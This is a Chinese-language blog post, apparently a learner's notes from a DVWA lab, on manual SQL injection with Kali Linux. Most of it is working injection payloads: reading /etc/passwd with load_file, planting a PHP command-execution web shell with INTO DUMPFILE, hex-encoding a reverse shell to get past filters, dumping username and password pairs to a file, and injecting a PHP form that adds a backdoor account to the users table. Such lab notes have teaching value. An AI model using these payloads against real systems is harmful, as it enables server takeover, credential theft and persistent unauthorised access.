zoukankan      html  css  js  c++  java
  • 小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

    SQL手工注入

    1、读取文件【load_file函数】

    ' union  SELECT null,load_file('/etc/passwd')--+

    burpsuite

    2、写入文件 

    ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   【写入一句话木马;INTO DUMPLING:MySQL函数,将输入下载在数据库中】

    ###此语句往往会提示无法写入,因为缺少权限【以运行MySQL的账号为己身获取的权限】

    ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE 'a.php' --+     【将其写入默认路径(使用单引号): /var/lib/mysql/dvwa/a.php   (dvwa的账号)】

    #当无权限进行指定目录写入文件时,可使用文件包含漏洞

    首先,往通用目录/tmp/中写入,然后结合文件包含漏洞

    ' union select null, "<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/tmp/a.php" --+

    #也可上传反弹shell

    注:当通过URL注入网页木马时,“<”、“?”、“php”、“>”等字符可能会触发过滤机制,所以,应使用编码绕过

    ###将网页木马编译成二进制文件,数据库会使用INTO DUMPLING将其转换成PHP代码储存

    复制反弹shell

    修改反弹shellIP

    编码

    cat b.php | xxd -ps     【xxd:linux集成,16进制编辑查看器;-ps:显示编码后内容】

    #16进制存在换行符,需整理一下,再加一层管道

    cat b.php | xxd -ps | tr -d ' '  【tr -d :删除】

    再将编码后的密文替换明文

    (0x密文)

     

    3、保存下载数【拖库】

     ' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--+

    #若没有文件包含之类的漏洞可以下载拖库文件,则通过限定查询数目,一步一步复制黏贴进行数据窃取

     当上传webshell无法实现目的操作,可编写服务器端代码,为己所用

    #对目标有足够了解,数据库结构,表结构,程序设计逻辑方法

    创建表单,向用户账号数据库插入一个账号【因为难以破解数据库的加密内容】,相当于开发一个功能

    ' union select null,'<?php if(isset($_POST["submit"])) { $userID = $_POST["userID"]; $first_name
    = $_POST["first_name"]; $last_name = $_POST["last_name"]; $username =
    $_POST["username"]; $avatar = $_POST["avatar"]; echo "userID: $userID<BR>"; echo
    "first_name: $first_name<BR>"; echo "last_name: $last_name<BR>"; echo "username:
    $username<BR>"; echo "avatar: $avatar<BR>";
    $con=mysqli_connect("127.0.0.1","root","","dvwa"); if (mysqli_connect_errno()) { echo
    "Failed to connect to MySQL: " . mysqli_connect_error(); } else { echo "Connected to
    database<BR>"; } $password = "123"; $sql="insert into dvwa.users values (\"$userID\",
    "$first_name\",\"$last_name\",\"$username\",MD5(\"$password\"),\"$avatar
    ")"; if (mysqli_query($con,$sql)) { echo "[Successful Insertion]: $sql"; } else { echo "Error
    creating database: " . mysqli_error($con); } mysqli_close($con); } ?> <form method="post"
    action="<?php echo $_SERVER["PHP_SELF"]; ?>"> <input type="text" name="userID"
    value="33"><br> <input type="text" name="first_name" value="fh"><br> <input type="text"
    name="last_name" value="y"><br> <input type="text" name="username" value="yfh"><br>
    <input type="text" name="avatar" value="yfh!"><br> <input type="submit" name="submit"
    value="Submit Form"><br> </form>' INTO DUMPFILE '/tmp/user.php' --

     

  • 相关阅读:
    代码点与代码单元
    IIS最大并发连接数
    PhoneGap:JS跨域请求
    字符串长度
    android学习笔记:adb更换端口后成功启动
    java学习笔记:eclipse的workspace和working set
    java学习笔记:Eclipse打开现有项目
    java学习笔记:文件名区分大小写
    mysql学习笔记:存储过程
    mySql学习笔记:比sql server书写要简单
  • 原文地址:https://www.cnblogs.com/zixuanfy/p/5998921.html
Copyright © 2011-2022 走看看